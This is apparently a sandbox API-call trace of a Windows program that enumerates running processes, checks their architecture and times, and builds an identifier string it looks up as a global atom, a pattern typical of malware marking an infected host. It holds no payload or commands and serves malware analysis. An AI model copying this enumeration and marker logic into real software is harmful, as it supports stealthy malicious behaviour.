	[0122.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d618, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.464] CloseHandle (hObject=0x698) returned 1
	[0122.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.464] CloseHandle (hObject=0x698) returned 1
	[0122.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9820, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.464] CloseHandle (hObject=0x698) returned 1
	[0122.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.465] CloseHandle (hObject=0x698) returned 1
	[0122.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5a30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.465] CloseHandle (hObject=0x698) returned 1
	[0122.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.466] CloseHandle (hObject=0x698) returned 1
	[0122.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.466] CloseHandle (hObject=0x698) returned 1
	[0122.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.466] CloseHandle (hObject=0x698) returned 1
	[0122.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.467] CloseHandle (hObject=0x698) returned 1
	[0122.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.467] CloseHandle (hObject=0x698) returned 1
	[0122.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b99d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.467] CloseHandle (hObject=0x698) returned 1
	[0122.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.468] CloseHandle (hObject=0x698) returned 1
	[0122.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.468] CloseHandle (hObject=0x698) returned 1
	[0122.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.469] CloseHandle (hObject=0x698) returned 1
	[0122.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.469] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.469] CloseHandle (hObject=0x698) returned 1
	[0122.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.471] CloseHandle (hObject=0x698) returned 1
	[0122.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9938, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.472] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.472] CloseHandle (hObject=0x698) returned 1
	[0122.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9a28, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.472] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.472] CloseHandle (hObject=0x698) returned 1
	[0122.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.472] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.473] GetLastError () returned 0x5
	[0122.474] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.474] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.474] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] GetLastError () returned 0x5
	[0122.474] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.475] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetLastError () returned 0x5
	[0122.476] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.476] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.476] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.477] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.477] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.477] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.477] CloseHandle (hObject=0x698) returned 1
	[0122.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.477] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.477] CloseHandle (hObject=0x698) returned 1
	[0122.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.477] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.477] CloseHandle (hObject=0x698) returned 1
	[0122.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.478] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.478] CloseHandle (hObject=0x698) returned 1
	[0122.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.479] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.479] CloseHandle (hObject=0x698) returned 1
	[0122.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.529] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5a18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d568, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.534] CloseHandle (hObject=0x698) returned 1
	[0122.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.534] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.536] CloseHandle (hObject=0x698) returned 1
	[0122.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.537] CloseHandle (hObject=0x698) returned 1
	[0122.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.537] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.537] CloseHandle (hObject=0x698) returned 1
	[0122.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.538] CloseHandle (hObject=0x698) returned 1
	[0122.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.538] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
